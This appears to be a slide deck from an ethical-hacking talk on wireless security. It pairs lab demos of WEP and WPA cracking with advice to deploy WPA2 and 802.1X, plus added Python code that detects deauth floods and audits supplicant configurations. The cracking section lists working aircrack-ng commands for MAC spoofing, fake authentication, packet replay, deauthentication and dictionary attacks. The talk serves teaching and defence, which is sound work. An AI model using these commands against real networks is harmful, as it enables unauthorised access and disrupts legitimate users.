Network Security and Ethical Hacking
- Wireless
Jason Maynard
CCDA, CCIP, CCNP, GSEC, GCFW
Infrastructure Architect
• Is it Secure?
It really depends on the
methods used to secure it.
Encryption and Authentication Methods
WEP
Short for Wired Equivalent Privacy, a security protocol for
wireless local area networks (WLANs) defined in the 802.11b
standard.
WPA
Short for Wi-Fi Protected Access, a Wi-Fi standard that was
designed to improve upon the security features of WEP.
WPA2
Short for Wi-Fi Protected Access 2, the follow-on
security method to WPA for wireless networks that
provides stronger data protection and network access
control. Based on the IEEE 802.11i standard.
MAC authentication is easy to sniff and spoof, and
the SSID can still be obtained by sniffing the network.
Couple of demos
• WEP
• WPA
Items Needed
• USB key with Backtrack3 (Linux distro used for ethical hacking)
• DWA-642 PCMCIA card (Atheros chipset, uses the madwifi-ng driver)
• Access point running WEP, and then running WPA
• 2 client laptops running Linux and Windows connecting to the AP
Command Line Tools
•ifconfig
•iwconfig
•macchanger
•airmon-ng
•airodump-ng
•aireplay-ng
•aircrack-ng
Open a couple of terminals
– Type “iwconfig” to identify the cards
– Type “ifconfig” to determine which cards are up
– Type “airmon-ng stop wifi0” and “airmon-ng stop ath0” to ensure the
cards are not running in monitor mode
– Type “ifconfig ath0 down” and “ifconfig wifi0 down” to ensure the
interfaces are down
– Type “macchanger --mac 00:11:22:33:44:55 wifi0” to change the MAC address
– Type “airmon-ng start wifi0” to put the card in monitor mode
– Type “airodump-ng ath0” to find an AP that is running WEP or WPA, then copy the SSID and stop the
scan
WEP Cracking
– Type “airodump-ng -w wep.cap -c <channel #> --bssid <SSID in HEX> ath0” (this captures
packets sent to the AP)
– New terminal
– Type “aireplay-ng -1 0 -a <SSID> -h <MAC in HEX> ath0” (this fakes authentication)
– Go to another terminal
– Type “aireplay-ng -2 -p 0841 -b <SSID> -h <MAC in HEX> ath0” (interactive packet replay)
– Go to another terminal
– Type “aircrack-ng wep*.cap”
WPA Cracking
– Type “airodump-ng -w wpa.cap -c <channel #> --bssid <SSID in HEX> ath0” (this captures packets sent to
the AP)
– Type “aireplay-ng -0 5 -a <SSID> ath0” (deauthentication)
– Type “aircrack-ng -0 -x2 wpa*.cap -w /pentest/wireless/aircrack-ng/test/password.lst”
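The deauthentication step in the WPA demo is visible on the air, so a wireless IDS can alert on it. The following is an added example (not from the original slides) that counts deauth/disassoc frames per BSSID in a sliding window; the threshold, window, MAC addresses and the bare 802.11 header layout (no radiotap prefix) are assumptions for illustration.

```python
import struct
from collections import defaultdict, deque

DEAUTH, DISASSOC, BEACON = 0xC, 0xA, 0x8   # 802.11 management subtypes

def mac(raw):
    return ":".join(f"{b:02x}" for b in raw)

def parse_teardown(frame):
    """Return (bssid, dst, reason) for a deauth/disassoc frame, else None."""
    if len(frame) < 26:                  # 24-byte header + 2-byte reason code
        return None
    ftype, subtype = (frame[0] >> 2) & 0x3, (frame[0] >> 4) & 0xF
    if ftype != 0 or subtype not in (DEAUTH, DISASSOC):
        return None
    (reason,) = struct.unpack_from("<H", frame, 24)
    return mac(frame[16:22]), mac(frame[4:10]), reason

def detect_floods(capture, threshold=5, window=1.0):
    """capture: time-ordered (timestamp_seconds, frame_bytes) pairs.
    Returns {bssid: peak frames per window} for BSSIDs reaching threshold."""
    recent, alerts = defaultdict(deque), {}
    for ts, frame in capture:
        parsed = parse_teardown(frame)
        if parsed is None:
            continue
        q = recent[parsed[0]]
        q.append(ts)
        while ts - q[0] > window:        # drop timestamps outside the window
            q.popleft()
        if len(q) >= threshold:
            alerts[parsed[0]] = max(alerts.get(parsed[0], 0), len(q))
    return alerts

def build(subtype, dst, src, bssid, reason=7):
    """Build a minimal management frame for the constructed sample below."""
    raw = lambda m: bytes.fromhex(m.replace(":", ""))
    return (bytes([subtype << 4, 0]) + b"\x00\x00" + raw(dst) + raw(src)
            + raw(bssid) + b"\x00\x00" + struct.pack("<H", reason))

# Constructed sample: a burst aimed at one lab AP, one ordinary deauth, a beacon.
AP1, AP2, STA = "02:00:00:00:00:01", "02:00:00:00:00:02", "02:00:00:00:00:10"
SAMPLE = [(10.0 + i * 0.1, build(DEAUTH, STA, AP1, AP1)) for i in range(6)]
SAMPLE += [(12.0, build(DEAUTH, STA, AP2, AP2, reason=3)),
           (12.5, build(BEACON, "ff:ff:ff:ff:ff:ff", AP1, AP1))]

if __name__ == "__main__":
    print(detect_floods(SAMPLE))
```

A single deauth frame is normal client behaviour, which is why the check is rate-based rather than per-frame.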
So what do I do to protect my network and
wireless users?
Use WPA2 with 802.1x
WPA2 provides government grade security by
implementing the National Institute of Standards
and Technology (NIST) FIPS 140-2 compliant AES
encryption algorithm and 802.1x-based
authentication
802.1X provides port-based authentication,
which involves communications between a
supplicant, authenticator, and authentication
server.
802.1X – The most secure methods
• EAP – PEAP
• EAP – TLS
EAP – PEAP
• Uses Server certificates and MSCHAPv2
EAP – TLS
• One of the most secure methods; uses client
and server certificates. More difficult to
manage.
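On the Linux client laptops, the recommendations above (WPA2, 802.1X, server certificates for PEAP, client and server certificates for EAP-TLS) can be checked against the supplicant configuration. The following is an added example, not from the original slides: it assumes the clients use wpa_supplicant, checks only the `ca_cert` key for server validation, assumes no value contains `}`, and uses constructed SSIDs and placeholder certificate paths.

```python
import re

def parse_networks(conf):
    nets = []
    for body in re.findall(r"network\s*=\s*\{(.*?)\}", conf, re.S):
        pairs = (l.split("=", 1) for l in body.splitlines()
                 if "=" in l and not l.strip().startswith("#"))
        nets.append({k.strip(): v.strip().strip('"') for k, v in pairs})
    return nets

def audit(net):
    """List where a network block falls short of WPA2 with 802.1X."""
    km, out = net.get("key_mgmt", "").split(), []
    if "WPA-EAP" not in km:
        return ["no 802.1X: key_mgmt lacks WPA-EAP"]
    if net.get("proto", "").split() not in (["RSN"], ["WPA2"]):
        out.append("proto not restricted to RSN (WPA2)")
    if net.get("pairwise", "").split() != ["CCMP"]:
        out.append("pairwise not restricted to CCMP (AES)")
    if "ca_cert" not in net:
        out.append("server certificate not validated: ca_cert missing")
    eap = net.get("eap", "").split()
    if "PEAP" in eap and "MSCHAPV2" not in net.get("phase2", "").upper():
        out.append("PEAP inner method is not MSCHAPv2")
    if "TLS" in eap and not {"client_cert", "private_key"} <= net.keys():
        out.append("EAP-TLS without client certificate and key")
    return out

# Constructed sample; SSIDs and certificate paths are placeholders.
SAMPLE = '''
network={
    ssid="corp-peap"
    key_mgmt=WPA-EAP
    eap=PEAP
    phase2="auth=MSCHAPV2"
}
network={
    ssid="corp-tls"
    key_mgmt=WPA-EAP
    proto=RSN
    pairwise=CCMP
    eap=TLS
    ca_cert="/etc/ssl/example-ca.pem"
    client_cert="/etc/ssl/example-client.pem"
    private_key="/etc/ssl/example-client.key"
}
'''

def report(conf=SAMPLE):
    return {n.get("ssid"): audit(n) for n in parse_networks(conf)}
```

The PEAP block in the sample names the right methods but is still flagged, because it neither pins the protocol and cipher nor validates the server certificate.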
Wireless LAN Solution
[Network diagram. Labels: Remote Sites; Mississauga; HP Laptop, 802.1x (EAP-PEAP), WPA2; Cisco 1242 LWAPP; Cisco WLC 4400; Catalyst 3560 PoE-48; Cisco 4500; Windows 2003 Ent Server running ACS 4.0; Novell Netware 6.5 SP5; SSL LDAP.]
1. Users enter their Novell credentials to log onto the wireless network.
2. Cisco WLC forwards the user's credentials to the ACS server.
3. Cisco ACS forwards the credentials to the Netware 6.5 SP 5 server, or Windows 2003 Ent Server running ACS 4.0 will have Edirectory installed locally making it more secure.
4. Novell checks its directory services for the user account and validates the user's credentials.
5. User is granted access to the WLAN.
• Cisco LWAPP gets its configuration from the WLC using the LWAPP protocol.
• Cisco 1242 LWAPP using HREAP to do local switching.
Supporting Products:
• FreeRadius and OpenSSL
• Microsoft Radius and Group Policy, Certificate Services
• Cisco ACS server and Local Authentication/AD/NDS
Support Products Links:
Backtrack
• http://www.remote-exploit.org/backtrack_download.html
FreeRadius and OpenSSL
• http://wiki.freeradius.org
• http://www.openssl.org
Cisco ACS
• http://www.cisco.com/en/US/products/sw/secursw/ps2086
Microsoft
• http://www.microsoft.com/technet/security/prodtech/windowsserver2003/pkiwire/swlan.mspx?mfr=true
• http://technet.microsoft.com/en-us/magazine/cc162468.aspx
Questions?